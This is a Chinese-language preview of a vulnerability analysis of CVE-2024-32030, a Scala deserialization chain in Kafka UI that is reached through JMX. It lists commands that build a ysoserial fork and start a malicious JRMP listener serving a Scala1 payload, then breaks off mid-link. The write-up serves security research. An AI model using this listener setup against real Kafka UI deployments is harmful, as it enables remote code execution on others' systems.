CVE-2024-32030 Scala反序列化链分析

文章预览

前言 Kafka UI是Apache Kafka管理的开源Web UI。Kafka UI API允许用户通过指定网络地址和端口连接到不同的Kafka brokers。作为一个独立的功能，它还提供了通过连接到其JMX端口监视Kafka brokers性能的能力。本文主要对其中使用到的Scala反序列化链进行分析 搭建测试环境 1、首先需要设置一个恶意的JMX监听器，通过ysoserial生成一个带有有效载荷的序列化对象 git clone https://github.com/artsploit/ysoserial/ cd ysoserial & & git checkout scala1 mvn package -D skipTests = true #make sure you use Java 8 for compilation, it might not compile with recent versions java -cp target/ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.JRMPListener 1718 Scala1 "org.apache.commons.collections.enableUnsafeSerialization:true" 2、在github上下载kafka-ui-0.7.1版本的源码，通过该项目来搭建本地测试环境就不需要考虑依赖的导入问题 https://codeload.github.com/provectus/ka ………………………………